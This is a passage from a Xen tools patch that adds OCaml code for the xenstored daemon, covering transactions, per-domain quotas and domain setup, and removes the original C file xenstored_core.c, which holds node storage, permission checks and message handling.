"Xenstored.xenstored#add_watch", "Too many watches")) + method commit transaction = + try + List.iter (domain_entry_change self#domains) (self#transactions#domain_entries transaction); + Transaction.fire_watches self#watches (self#transactions#commit transaction); + 
true + with _ -> false + method domain_entry_count transaction (domain_id : int) = + let entries = try self#domains#entry_count transaction.Transaction.domain_id with Not_found -> 0 in + try + let transaction_entries = (List.find (fun entry -> entry.Transaction.id = transaction.Transaction.domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in + transaction_entries + entries + with Not_found -> entries + method domain_entry_decr store transaction path = + let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in + if Domain.is_unprivileged_id domain_id then + if transaction.Transaction.transaction_id <> 0l + then self#transactions#domain_entry_decr transaction domain_id + else self#domains#entry_decr domain_id + method domain_entry_incr store transaction path = + let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in + if Domain.is_unprivileged_id domain_id then + if transaction.Transaction.transaction_id <> 0l + then ( + self#transactions#domain_entry_incr transaction domain_id; + let entry_count = (List.find (fun entry -> entry.Transaction.id = domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in + let entry_count_current = try self#domains#entry_count domain_id with Not_found -> 0 in + if entry_count + entry_count_current > self#options.Option.quota_num_entries_per_domain + then ( + self#transactions#domain_entry_decr transaction domain_id; + raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path)) + ) + ) + else ( + self#domains#entry_incr domain_id; + let entry_count = self#domains#entry_count domain_id in + if entry_count > self#options.Option.quota_num_entries_per_domain + then ( + self#domains#entry_decr domain_id; + raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path)) + ) + ) + method domains = m_domains + method initialise_domains = + if self#options.Option.domain_init + 
then ( + if Domain.xc_handle = Constants.null_file_descr then Utils.barf_perror "Failed to open connection to hypervisor\n"; + Eventchan.init (); + let dom0 = + if self#options.Option.separate_domain + then ( + self#add_domain (domxs_init (Os.get_domxs_id ())); + Domain.domu_init 0 (Os.get_dom0_port ()) (Os.get_dom0_mfn ()) true + ) + else domxs_init 0 in + m_virq_port <- Eventchan.bind_virq Constants.virq_dom_exc; + if m_virq_port = Constants.null_file_descr then Utils.barf_perror "Failed to bind to domain exception virq port\n"; + self#add_domain dom0; + Eventchan.get_channel () + ) + else Constants.null_file_descr + method initialise_store = + let path = Store.root_path ^ "tool" ^ Store.dividor_str ^ "xenstored" in + self#store#create_node path; + self#permissions#add self#store path 0 + method new_transaction domain store = + if not (Domain.is_unprivileged domain) || self#transactions#num_transactions_for_domain domain#id < self#options.Option.quota_max_transaction + then self#transactions#new_transaction domain store + else raise (Constants.Xs_error (Constants.ENOSPC, "Xenstored.xenstored#new_transaction", "Too many transactions")) + method options = m_options + method permissions = m_permissions + method remove_domain domain = + self#domains#remove domain; + Trace.destroy domain#id "connection"; + self#watches#remove_watches domain; + self#transactions#remove_domain domain + method transactions = m_transactions + method virq_port = m_virq_port + method watches = m_watches +end diff -r 10a8fae412c5 tools/xenstore/xenstored_core.c --- a/tools/xenstore/xenstored_core.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,1987 +0,0 @@ -/* - Simple prototype Xen Store Daemon providing simple tree-like database. 
- Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "utils.h" -#include "list.h" -#include "talloc.h" -#include "xs_lib.h" -#include "xenstored_core.h" -#include "xenstored_watch.h" -#include "xenstored_transaction.h" -#include "xenstored_domain.h" -#include "xenctrl.h" -#include "tdb.h" - -#include "hashtable.h" - -extern int xce_handle; /* in xenstored_domain.c */ - -static bool verbose = false; -LIST_HEAD(connections); -static int tracefd = -1; -static bool recovery = true; -static bool remove_local = true; -static int reopen_log_pipe[2]; -static char *tracefile = NULL; -static TDB_CONTEXT *tdb_ctx; - -static void corrupt(struct connection *conn, const char *fmt, ...); -static void check_store(void); - -#define log(...) 
\ - do { \ - char *s = talloc_asprintf(NULL, __VA_ARGS__); \ - trace("%s\n", s); \ - syslog(LOG_ERR, "%s", s); \ - talloc_free(s); \ - } while (0) - - -int quota_nb_entry_per_domain = 1000; -int quota_nb_watch_per_domain = 128; -int quota_max_entry_size = 2048; /* 2K */ -int quota_max_transaction = 10; - -TDB_CONTEXT *tdb_context(struct connection *conn) -{ - /* conn = NULL used in manual_node at setup. */ - if (!conn || !conn->transaction) - return tdb_ctx; - return tdb_transaction_context(conn->transaction); -} - -bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb) -{ - if (rename(newname, xs_daemon_tdb()) != 0) - return false; - tdb_close(tdb_ctx); - tdb_ctx = talloc_steal(talloc_autofree_context(), newtdb); - return true; -} - -static char *sockmsg_string(enum xsd_sockmsg_type type) -{ - switch (type) { - case XS_DEBUG: return "DEBUG"; - case XS_DIRECTORY: return "DIRECTORY"; - case XS_READ: return "READ"; - case XS_GET_PERMS: return "GET_PERMS"; - case XS_WATCH: return "WATCH"; - case XS_UNWATCH: return "UNWATCH"; - case XS_TRANSACTION_START: return "TRANSACTION_START"; - case XS_TRANSACTION_END: return "TRANSACTION_END"; - case XS_INTRODUCE: return "INTRODUCE"; - case XS_RELEASE: return "RELEASE"; - case XS_GET_DOMAIN_PATH: return "GET_DOMAIN_PATH"; - case XS_WRITE: return "WRITE"; - case XS_MKDIR: return "MKDIR"; - case XS_RM: return "RM"; - case XS_SET_PERMS: return "SET_PERMS"; - case XS_WATCH_EVENT: return "WATCH_EVENT"; - case XS_ERROR: return "ERROR"; - case XS_IS_DOMAIN_INTRODUCED: return "XS_IS_DOMAIN_INTRODUCED"; - case XS_RESUME: return "RESUME"; - case XS_SET_TARGET: return "SET_TARGET"; - default: - return "**UNKNOWN**"; - } -} - -void trace(const char *fmt, ...) 
-{ - va_list arglist; - char *str; - char sbuf[1024]; - int ret, dummy; - - if (tracefd < 0) - return; - - /* try to use a static buffer */ - va_start(arglist, fmt); - ret = vsnprintf(sbuf, 1024, fmt, arglist); - va_end(arglist); - - if (ret <= 1024) { - dummy = write(tracefd, sbuf, ret); - return; - } - - /* fail back to dynamic allocation */ - va_start(arglist, fmt); - str = talloc_vasprintf(NULL, fmt, arglist); - va_end(arglist); - dummy = write(tracefd, str, strlen(str)); - talloc_free(str); -} - -static void trace_io(const struct connection *conn, - const struct buffered_data *data, - int out) -{ - unsigned int i; - time_t now; - struct tm *tm; - -#ifdef HAVE_DTRACE - dtrace_io(conn, data, out); -#endif - - if (tracefd < 0) - return; - - now = time(NULL); - tm = localtime(&now); - - trace("%s %p %04d%02d%02d %02d:%02d:%02d %s (", - out ? "OUT" : "IN", conn, - tm->tm_year + 1900, tm->tm_mon + 1, - tm->tm_mday, tm->tm_hour, tm->tm_min, tm->tm_sec, - sockmsg_string(data->hdr.msg.type)); - - for (i = 0; i < data->hdr.msg.len; i++) - trace("%c", (data->buffer[i] != '\0') ? data->buffer[i] : ' '); - trace(")\n"); -} - -void trace_create(const void *data, const char *type) -{ - trace("CREATE %s %p\n", type, data); -} - -void trace_destroy(const void *data, const char *type) -{ - trace("DESTROY %s %p\n", type, data); -} - -/** - * Signal handler for SIGHUP, which requests that the trace log is reopened - * (in the main loop). A single byte is written to reopen_log_pipe, to awaken - * the select() in the main loop. 
- */ -static void trigger_reopen_log(int signal __attribute__((unused))) -{ - char c = 'A'; - int dummy; - dummy = write(reopen_log_pipe[1], &c, 1); -} - - -static void reopen_log(void) -{ - if (tracefile) { - if (tracefd > 0) - close(tracefd); - - tracefd = open(tracefile, O_WRONLY|O_CREAT|O_APPEND, 0600); - - if (tracefd < 0) - perror("Could not open tracefile"); - else - trace("\n***\n"); - } -} - - -static bool write_messages(struct connection *conn) -{ - int ret; - struct buffered_data *out; - - out = list_top(&conn->out_list, struct buffered_data, list); - if (out == NULL) - return true; - - if (out->inhdr) { - if (verbose) - xprintf("Writing msg %s (%.*s) out to %p\n", - sockmsg_string(out->hdr.msg.type), - out->hdr.msg.len, - out->buffer, conn); - ret = conn->write(conn, out->hdr.raw + out->used, - sizeof(out->hdr) - out->used); - if (ret < 0) - return false; - - out->used += ret; - if (out->used < sizeof(out->hdr)) - return true; - - out->inhdr = false; - out->used = 0; - - /* Second write might block if non-zero. */ - if (out->hdr.msg.len && !conn->domain) - return true; - } - - ret = conn->write(conn, out->buffer + out->used, - out->hdr.msg.len - out->used); - if (ret < 0) - return false; - - out->used += ret; - if (out->used != out->hdr.msg.len) - return true; - - trace_io(conn, out, 1); - - list_del(&out->list); - talloc_free(out); - - return true; -} - -static int destroy_conn(void *_conn) -{ - struct connection *conn = _conn; - - /* Flush outgoing if possible, but don't block. 
*/ - if (!conn->domain) { - fd_set set; - struct timeval none; - - FD_ZERO(&set); - FD_SET(conn->fd, &set); - none.tv_sec = none.tv_usec = 0; - - while (!list_empty(&conn->out_list) - && select(conn->fd+1, NULL, &set, NULL, &none) == 1) - if (!write_messages(conn)) - break; - close(conn->fd); - } - if (conn->target) - talloc_unlink(conn, conn->target); - list_del(&conn->list); - trace_destroy(conn, "connection"); - return 0; -} - - -static void set_fd(int fd, fd_set *set, int *max) -{ - if (fd < 0) - return; - FD_SET(fd, set); - if (fd > *max) - *max = fd; -} - - -static int initialize_set(fd_set *inset, fd_set *outset, int sock, int ro_sock, - struct timeval **ptimeout) -{ - static struct timeval zero_timeout = { 0 }; - struct connection *conn; - int max = -1; - - *ptimeout = NULL; - - FD_ZERO(inset); - FD_ZERO(outset); - - set_fd(sock, inset, &max); - set_fd(ro_sock, inset, &max); - set_fd(reopen_log_pipe[0], inset, &max); - - if (xce_handle != -1) - set_fd(xc_evtchn_fd(xce_handle), inset, &max); - - list_for_each_entry(conn, &connections, list) { - if (conn->domain) { - if (domain_can_read(conn) || - (domain_can_write(conn) && - !list_empty(&conn->out_list))) - *ptimeout = &zero_timeout; - } else { - set_fd(conn->fd, inset, &max); - if (!list_empty(&conn->out_list)) - FD_SET(conn->fd, outset); - } - } - - return max; -} - -static int destroy_fd(void *_fd) -{ - int *fd = _fd; - close(*fd); - return 0; -} - -/* Is child a subnode of parent, or equal? */ -bool is_child(const char *child, const char *parent) -{ - unsigned int len = strlen(parent); - - /* / should really be "" for this algorithm to work, but that's a - * usability nightmare. */ - if (streq(parent, "/")) - return true; - - if (strncmp(child, parent, len) != 0) - return false; - - return child[len] == '/' || child[len] == '\0'; -} - -/* If it fails, returns NULL and sets errno. 
*/ -static struct node *read_node(struct connection *conn, const char *name) -{ - TDB_DATA key, data; - uint32_t *p; - struct node *node; - TDB_CONTEXT * context = tdb_context(conn); - - key.dptr = (void *)name; - key.dsize = strlen(name); - data = tdb_fetch(context, key); - - if (data.dptr == NULL) { - if (tdb_error(context) == TDB_ERR_NOEXIST) - errno = ENOENT; - else { - log("TDB error on read: %s", tdb_errorstr(context)); - errno = EIO; - } - return NULL; - } - - node = talloc(name, struct node); - node->name = talloc_strdup(node, name); - node->parent = NULL; - node->tdb = tdb_context(conn); - talloc_steal(node, data.dptr); - - /* Datalen, childlen, number of permissions */ - p = (uint32_t *)data.dptr; - node->num_perms = p[0]; - node->datalen = p[1]; - node->childlen = p[2]; - - /* Permissions are struct xs_permissions. */ - node->perms = (void *)&p[3]; - /* Data is binary blob (usually ascii, no nul). */ - node->data = node->perms + node->num_perms; - /* Children is strings, nul separated. */ - node->children = node->data + node->datalen; - - return node; -} - -static bool write_node(struct connection *conn, const struct node *node) -{ - /* - * conn will be null when this is called from manual_node. - * tdb_context copes with this. 
- */ - - TDB_DATA key, data; - void *p; - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - data.dsize = 3*sizeof(uint32_t) - + node->num_perms*sizeof(node->perms[0]) - + node->datalen + node->childlen; - - if (domain_is_unprivileged(conn) && data.dsize >= quota_max_entry_size) - goto error; - - data.dptr = talloc_size(node, data.dsize); - ((uint32_t *)data.dptr)[0] = node->num_perms; - ((uint32_t *)data.dptr)[1] = node->datalen; - ((uint32_t *)data.dptr)[2] = node->childlen; - p = data.dptr + 3 * sizeof(uint32_t); - - memcpy(p, node->perms, node->num_perms*sizeof(node->perms[0])); - p += node->num_perms*sizeof(node->perms[0]); - memcpy(p, node->data, node->datalen); - p += node->datalen; - memcpy(p, node->children, node->childlen); - - /* TDB should set errno, but doesn't even set ecode AFAICT. */ - if (tdb_store(tdb_context(conn), key, data, TDB_REPLACE) != 0) { - corrupt(conn, "Write of %s failed", key.dptr); - goto error; - } - return true; - error: - errno = ENOSPC; - return false; -} - -static enum xs_perm_type perm_for_conn(struct connection *conn, - struct xs_permissions *perms, - unsigned int num) -{ - unsigned int i; - enum xs_perm_type mask = XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER; - - if (!conn->can_write) - mask &= ~XS_PERM_WRITE; - - /* Owners and tools get it all... */ - if (!conn->id || perms[0].id == conn->id - || (conn->target && perms[0].id == conn->target->id)) - return (XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER) & mask; - - for (i = 1; i < num; i++) - if (perms[i].id == conn->id - || (conn->target && perms[i].id == conn->target->id)) - return perms[i].perms & mask; - - return perms[0].perms & mask; -} - -static char *get_parent(const char *node) -{ - char *slash = strrchr(node + 1, '/'); - if (!slash) - return talloc_strdup(node, "/"); - return talloc_asprintf(node, "%.*s", (int)(slash - node), node); -} - -/* What do parents say? 
*/ -static enum xs_perm_type ask_parents(struct connection *conn, const char *name) -{ - struct node *node; - - do { - name = get_parent(name); - node = read_node(conn, name); - if (node) - break; - } while (!streq(name, "/")); - - /* No permission at root? We're in trouble. */ - if (!node) - corrupt(conn, "No permissions file at root"); - - return perm_for_conn(conn, node->perms, node->num_perms); -} - -/* We have a weird permissions system. You can allow someone into a - * specific node without allowing it in the parents. If it's going to - * fail, however, we don't want the errno to indicate any information - * about the node. */ -static int errno_from_parents(struct connection *conn, const char *node, - int errnum, enum xs_perm_type perm) -{ - /* We always tell them about memory failures. */ - if (errnum == ENOMEM) - return errnum; - - if (ask_parents(conn, node) & perm) - return errnum; - return EACCES; -} - -/* If it fails, returns NULL and sets errno. */ -struct node *get_node(struct connection *conn, - const char *name, - enum xs_perm_type perm) -{ - struct node *node; - - if (!name || !is_valid_nodename(name)) { - errno = EINVAL; - return NULL; - } - node = read_node(conn, name); - /* If we don't have permission, we don't have node. */ - if (node) { - if ((perm_for_conn(conn, node->perms, node->num_perms) & perm) - != perm) { - errno = EACCES; - node = NULL; - } - } - /* Clean up errno if they weren't supposed to know. */ - if (!node) - errno = errno_from_parents(conn, name, errno, perm); - return node; -} - -static struct buffered_data *new_buffer(void *ctx) -{ - struct buffered_data *data; - - data = talloc_zero(ctx, struct buffered_data); - if (data == NULL) - return NULL; - - data->inhdr = true; - return data; -} - -/* Return length of string (including nul) at this offset. - * If there is no nul, returns 0 for failure. 
- */ -static unsigned int get_string(const struct buffered_data *data, - unsigned int offset) -{ - const char *nul; - - if (offset >= data->used) - return 0; - - nul = memchr(data->buffer + offset, 0, data->used - offset); - if (!nul) - return 0; - - return nul - (data->buffer + offset) + 1; -} - -/* Break input into vectors, return the number, fill in up to num of them. - * Always returns the actual number of nuls in the input. Stores the - * positions of the starts of the nul-terminated strings in vec. - * Callers who use this and then rely only on vec[] will - * ignore any data after the final nul. - */ -unsigned int get_strings(struct buffered_data *data, - char *vec[], unsigned int num) -{ - unsigned int off, i, len; - - off = i = 0; - while ((len = get_string(data, off)) != 0) { - if (i < num) - vec[i] = data->buffer + off; - i++; - off += len; - } - return i; -} - -void send_reply(struct connection *conn, enum xsd_sockmsg_type type, - const void *data, unsigned int len) -{ - struct buffered_data *bdata; - - /* Message is a child of the connection context for auto-cleanup. */ - bdata = new_buffer(conn); - bdata->buffer = talloc_array(bdata, char, len); - - /* Echo request header in reply unless this is an async watch event. */ - if (type != XS_WATCH_EVENT) { - memcpy(&bdata->hdr.msg, &conn->in->hdr.msg, - sizeof(struct xsd_sockmsg)); - } else { - memset(&bdata->hdr.msg, 0, sizeof(struct xsd_sockmsg)); - } - - /* Update relevant header fields and fill in the message body. */ - bdata->hdr.msg.type = type; - bdata->hdr.msg.len = len; - memcpy(bdata->buffer, data, len); - - /* Queue for later transmission. 
*/ - list_add_tail(&bdata->list, &conn->out_list); -} - -/* Some routines (write, mkdir, etc) just need a non-error return */ -void send_ack(struct connection *conn, enum xsd_sockmsg_type type) -{ - send_reply(conn, type, "OK", sizeof("OK")); -} - -void send_error(struct connection *conn, int error) -{ - unsigned int i; - - for (i = 0; error != xsd_errors[i].errnum; i++) { - if (i == ARRAY_SIZE(xsd_errors) - 1) { - eprintf("xenstored: error %i untranslatable", error); - i = 0; /* EINVAL */ - break; - } - } - send_reply(conn, XS_ERROR, xsd_errors[i].errstring, - strlen(xsd_errors[i].errstring) + 1); -} - -static bool valid_chars(const char *node) -{ - /* Nodes can have lots of crap. */ - return (strspn(node, - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - "abcdefghijklmnopqrstuvwxyz" - "0123456789-/_@") == strlen(node)); -} - -bool is_valid_nodename(const char *node) -{ - /* Must start in /. */ - if (!strstarts(node, "/")) - return false; - - /* Cannot end in / (unless it's just "/"). */ - if (strends(node, "/") && !streq(node, "/")) - return false; - - /* No double //. */ - if (strstr(node, "//")) - return false; - - if (strlen(node) > XENSTORE_ABS_PATH_MAX) - return false; - - return valid_chars(node); -} - -/* We expect one arg in the input: return NULL otherwise. - * The payload must contain exactly one nul, at the end. 
- */ -static const char *onearg(struct buffered_data *in) -{ - if (!in->used || get_string(in, 0) != in->used) - return NULL; - return in->buffer; -} - -static char *perms_to_strings(const void *ctx, - struct xs_permissions *perms, unsigned int num, - unsigned int *len) -{ - unsigned int i; - char *strings = NULL; - char buffer[MAX_STRLEN(unsigned int) + 1]; - - for (*len = 0, i = 0; i < num; i++) { - if (!xs_perm_to_string(&perms[i], buffer, sizeof(buffer))) - return NULL; - - strings = talloc_realloc(ctx, strings, char, - *len + strlen(buffer) + 1); - strcpy(strings + *len, buffer); - *len += strlen(buffer) + 1; - } - return strings; -} - -char *canonicalize(struct connection *conn, const char *node) -{ - const char *prefix; - - if (!node || (node[0] == '/') || (node[0] == '@')) - return (char *)node; - prefix = get_implicit_path(conn); - if (prefix) - return talloc_asprintf(node, "%s/%s", prefix, node); - return (char *)node; -} - -bool check_event_node(const char *node) -{ - if (!node || !strstarts(node, "@")) { - errno = EINVAL; - return false; - } - return true; -} - -static void send_directory(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - send_reply(conn, XS_DIRECTORY, node->children, node->childlen); -} - -static void do_read(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - send_reply(conn, XS_READ, node->data, node->datalen); -} - -static void delete_node_single(struct connection *conn, struct node *node) -{ - TDB_DATA key; - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - if (tdb_delete(tdb_context(conn), key) != 0) { - corrupt(conn, "Could not delete '%s'", node->name); - return; - } - domain_entry_dec(conn, node); 
-} - -/* Must not be / */ -static char *basename(const char *name) -{ - return strrchr(name, '/') + 1; -} - -static struct node *construct_node(struct connection *conn, const char *name) -{ - const char *base; - unsigned int baselen; - struct node *parent, *node; - char *children, *parentname = get_parent(name); - - /* If parent doesn't exist, create it. */ - parent = read_node(conn, parentname); - if (!parent) - parent = construct_node(conn, parentname); - if (!parent) - return NULL; - - if (domain_entry(conn) >= quota_nb_entry_per_domain) - return NULL; - - /* Add child to parent. */ - base = basename(name); - baselen = strlen(base) + 1; - children = talloc_array(name, char, parent->childlen + baselen); - memcpy(children, parent->children, parent->childlen); - memcpy(children + parent->childlen, base, baselen); - parent->children = children; - parent->childlen += baselen; - - /* Allocate node */ - node = talloc(name, struct node); - node->tdb = tdb_context(conn); - node->name = talloc_strdup(node, name); - - /* Inherit permissions, except domains own what they create */ - node->num_perms = parent->num_perms; - node->perms = talloc_memdup(node, parent->perms, - node->num_perms * sizeof(node->perms[0])); - if (conn && conn->id) - node->perms[0].id = conn->id; - - /* No children, no data */ - node->children = node->data = NULL; - node->childlen = node->datalen = 0; - node->parent = parent; - domain_entry_inc(conn, node); - return node; -} - -static int destroy_node(void *_node) -{ - struct node *node = _node; - TDB_DATA key; - - if (streq(node->name, "/")) - corrupt(NULL, "Destroying root node!"); - - key.dptr = (void *)node->name; - key.dsize = strlen(node->name); - - tdb_delete(node->tdb, key); - return 0; -} - -static struct node *create_node(struct connection *conn, - const char *name, - void *data, unsigned int datalen) -{ - struct node *node, *i; - - node = construct_node(conn, name); - if (!node) - return NULL; - - node->data = data; - node->datalen = 
datalen; - - /* We write out the nodes down, setting destructor in case - * something goes wrong. */ - for (i = node; i; i = i->parent) { - if (!write_node(conn, i)) { - domain_entry_dec(conn, i); - return NULL; - } - talloc_set_destructor(i, destroy_node); - } - - /* OK, now remove destructors so they stay around */ - for (i = node; i; i = i->parent) - talloc_set_destructor(i, NULL); - return node; -} - -/* path, data... */ -static void do_write(struct connection *conn, struct buffered_data *in) -{ - unsigned int offset, datalen; - struct node *node; - char *vec[1] = { NULL }; /* gcc4 + -W + -Werror fucks code. */ - char *name; - - /* Extra "strings" can be created by binary data. */ - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - offset = strlen(vec[0]) + 1; - datalen = in->used - offset; - - name = canonicalize(conn, vec[0]); - node = get_node(conn, name, XS_PERM_WRITE); - if (!node) { - /* No permissions, invalid input? */ - if (errno != ENOENT) { - send_error(conn, errno); - return; - } - node = create_node(conn, name, in->buffer + offset, datalen); - if (!node) { - send_error(conn, errno); - return; - } - } else { - node->data = in->buffer + offset; - node->datalen = datalen; - if (!write_node(conn, node)){ - send_error(conn, errno); - return; - } - } - - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - send_ack(conn, XS_WRITE); -} - -static void do_mkdir(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_WRITE); - - /* If it already exists, fine. */ - if (!node) { - /* No permissions? 
*/ - if (errno != ENOENT) { - send_error(conn, errno); - return; - } - node = create_node(conn, name, NULL, 0); - if (!node) { - send_error(conn, errno); - return; - } - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - } - send_ack(conn, XS_MKDIR); -} - -static void delete_node(struct connection *conn, struct node *node) -{ - unsigned int i; - - /* Delete self, then delete children. If we crash, then the worst - that can happen is the children will continue to take up space, but - will otherwise be unreachable. */ - delete_node_single(conn, node); - - /* Delete children, too. */ - for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) { - struct node *child; - - child = read_node(conn, - talloc_asprintf(node, "%s/%s", node->name, - node->children + i)); - if (child) { - delete_node(conn, child); - } - else { - trace("delete_node: No child '%s/%s' found!\n", - node->name, node->children + i); - /* Skip it, we've already deleted the parent. */ - } - } -} - - -/* Delete memory using memmove. 
*/ -static void memdel(void *mem, unsigned off, unsigned len, unsigned total) -{ - memmove(mem + off, mem + off + len, total - off - len); -} - - -static bool remove_child_entry(struct connection *conn, struct node *node, - size_t offset) -{ - size_t childlen = strlen(node->children + offset); - memdel(node->children, offset, childlen + 1, node->childlen); - node->childlen -= childlen + 1; - return write_node(conn, node); -} - - -static bool delete_child(struct connection *conn, - struct node *node, const char *childname) -{ - unsigned int i; - - for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) { - if (streq(node->children+i, childname)) { - return remove_child_entry(conn, node, i); - } - } - corrupt(conn, "Can't find child '%s' in %s", childname, node->name); - return false; -} - - -static int _rm(struct connection *conn, struct node *node, const char *name) -{ - /* Delete from parent first, then if we crash, the worst that can - happen is the child will continue to take up space, but will - otherwise be unreachable. */ - struct node *parent = read_node(conn, get_parent(name)); - if (!parent) { - send_error(conn, EINVAL); - return 0; - } - - if (!delete_child(conn, parent, basename(name))) { - send_error(conn, EINVAL); - return 0; - } - - delete_node(conn, node); - return 1; -} - - -static void internal_rm(const char *name) -{ - char *tname = talloc_strdup(NULL, name); - struct node *node = read_node(NULL, tname); - if (node) - _rm(NULL, node, tname); - talloc_free(node); - talloc_free(tname); -} - - -static void do_rm(struct connection *conn, const char *name) -{ - struct node *node; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_WRITE); - if (!node) { - /* Didn't exist already? Fine, if parent exists. */ - if (errno == ENOENT) { - node = read_node(conn, get_parent(name)); - if (node) { - send_ack(conn, XS_RM); - return; - } - /* Restore errno, just in case. 
*/ - errno = ENOENT; - } - send_error(conn, errno); - return; - } - - if (streq(name, "/")) { - send_error(conn, EINVAL); - return; - } - - if (_rm(conn, node, name)) { - add_change_node(conn->transaction, name, true); - fire_watches(conn, name, true); - send_ack(conn, XS_RM); - } -} - - -static void do_get_perms(struct connection *conn, const char *name) -{ - struct node *node; - char *strings; - unsigned int len; - - name = canonicalize(conn, name); - node = get_node(conn, name, XS_PERM_READ); - if (!node) { - send_error(conn, errno); - return; - } - - strings = perms_to_strings(node, node->perms, node->num_perms, &len); - if (!strings) - send_error(conn, errno); - else - send_reply(conn, XS_GET_PERMS, strings, len); -} - -static void do_set_perms(struct connection *conn, struct buffered_data *in) -{ - unsigned int num; - struct xs_permissions *perms; - char *name, *permstr; - struct node *node; - - num = xs_count_strings(in->buffer, in->used); - if (num < 2) { - send_error(conn, EINVAL); - return; - } - - /* First arg is node name. */ - name = canonicalize(conn, in->buffer); - permstr = in->buffer + strlen(in->buffer) + 1; - num--; - - /* We must own node to do this (tools can do this too). */ - node = get_node(conn, name, XS_PERM_WRITE|XS_PERM_OWNER); - if (!node) { - send_error(conn, errno); - return; - } - - perms = talloc_array(node, struct xs_permissions, num); - if (!xs_strings_to_perms(perms, num, permstr)) { - send_error(conn, errno); - return; - } - - /* Unprivileged domains may not change the owner. 
*/ - if (domain_is_unprivileged(conn) && - perms[0].id != node->perms[0].id) { - send_error(conn, EPERM); - return; - } - - domain_entry_dec(conn, node); - node->perms = perms; - node->num_perms = num; - domain_entry_inc(conn, node); - - if (!write_node(conn, node)) { - send_error(conn, errno); - return; - } - - add_change_node(conn->transaction, name, false); - fire_watches(conn, name, false); - send_ack(conn, XS_SET_PERMS); -} - -static void do_debug(struct connection *conn, struct buffered_data *in) -{ - int num; - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - num = xs_count_strings(in->buffer, in->used); - - if (streq(in->buffer, "print")) { - if (num < 2) { - send_error(conn, EINVAL); - return; - } - xprintf("debug: %s", in->buffer + get_string(in, 0)); - } - - if (streq(in->buffer, "check")) - check_store(); - - send_ack(conn, XS_DEBUG); -} - -/* Process "in" for conn: "in" will vanish after this conversation, so - * we can talloc off it for temporary variables. May free "conn". 
- */ -static void process_message(struct connection *conn, struct buffered_data *in) -{ - struct transaction *trans; - - trans = transaction_lookup(conn, in->hdr.msg.tx_id); - if (IS_ERR(trans)) { - send_error(conn, -PTR_ERR(trans)); - return; - } - - assert(conn->transaction == NULL); - conn->transaction = trans; - - switch (in->hdr.msg.type) { - case XS_DIRECTORY: - send_directory(conn, onearg(in)); - break; - - case XS_READ: - do_read(conn, onearg(in)); - break; - - case XS_WRITE: - do_write(conn, in); - break; - - case XS_MKDIR: - do_mkdir(conn, onearg(in)); - break; - - case XS_RM: - do_rm(conn, onearg(in)); - break; - - case XS_GET_PERMS: - do_get_perms(conn, onearg(in)); - break; - - case XS_SET_PERMS: - do_set_perms(conn, in); - break; - - case XS_DEBUG: - do_debug(conn, in); - break; - - case XS_WATCH: - do_watch(conn, in); - break; - - case XS_UNWATCH: - do_unwatch(conn, in); - break; - - case XS_TRANSACTION_START: - do_transaction_start(conn, in); - break; - - case XS_TRANSACTION_END: - do_transaction_end(conn, onearg(in)); - break; - - case XS_INTRODUCE: - do_introduce(conn, in); - break; - - case XS_IS_DOMAIN_INTRODUCED: - do_is_domain_introduced(conn, onearg(in)); - break; - - case XS_RELEASE: - do_release(conn, onearg(in)); - break; - - case XS_GET_DOMAIN_PATH: - do_get_domain_path(conn, onearg(in)); - break; - - case XS_RESUME: - do_resume(conn, onearg(in)); - break; - - case XS_SET_TARGET: - do_set_target(conn, in); - break; - - default: - eprintf("Client unknown operation %i", in->hdr.msg.type); - send_error(conn, ENOSYS); - break; - } - - conn->transaction = NULL; -} - -static void consider_message(struct connection *conn) -{ - if (verbose) - xprintf("Got message %s len %i from %p\n", - sockmsg_string(conn->in->hdr.msg.type), - conn->in->hdr.msg.len, conn); - - process_message(conn, conn->in); - - talloc_free(conn->in); - conn->in = new_buffer(conn); -} - -/* Errors in reading or allocating here mean we get out of sync, so we - * drop the whole 
